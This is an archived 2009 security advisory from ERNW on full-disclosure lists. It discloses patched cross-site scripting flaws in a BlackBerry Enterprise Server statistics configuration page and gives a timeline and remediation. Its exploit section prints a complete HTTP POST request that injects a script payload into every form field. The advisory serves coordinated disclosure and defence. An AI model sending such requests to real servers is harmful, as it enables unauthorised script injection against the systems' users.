| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 17 Apr 2009 14:21:57 +0200 From: mozilla@...-guide.de To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, <vulnwatch@...nwatch.org> Subject: ERNW Security Advisory 01-2009: XSS in Blackberries Mobile Data Service Connection Service ERNW Security Advisory 01-2009 XSS in Blackberries Mobile Data Service Connection Service Author: Michael Thumann <mthumann[at]ernw.de> 1. Summary The Blackberry Mobile Data Service Connection is vulnerable to several XSS attacks in the "Customize Statistics Page". 2. CVSS V2 Base Score : 3.5 (based on vendor rating) 3. Products affected Blackberry Enterprise Server: all versions prior to 4.1.6 MR4 4. Patch Availability : A patch is available from the vendor. 5. Details Injecting scripts (containing standard and encoded XSS attacks) into all the fields of the "customize statitics page" reveals that none of the fields are properly validated for malicious input and the output isn't sanitized. 6. Solution Update the affected products to the actual version. 7. Time-Line 16 Feb 2009: Discovery of the vulnerability 02 Mar 2009: Vulnerability reported to vendor 02 Mar 2009: Answer from vendor 16 Apr 2009: Patch available 16 Apr 2009: Public Disclosure 8. Exploit POST /admin/statistics/ConfigureStatistics HTTP/1.0 Cookie: JSESSIONID=.... Content-Length: 753 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: ... Content-Type: application/x-www-form-urlencoded Referer: http://x:8080/admin/statistics/ConfigureStatistics customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E &lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript% 3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript %3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C% 2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E &delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E 9. Thanks We would like to thank the guys from Blackberry for working together on this issue in a professional and responsible way. 10. Disclaimer The informations in this advisory are provided "AS IS" without warranty of any kind. In no event shall the authors be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages due to the misuse of any information provided in this advisory. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists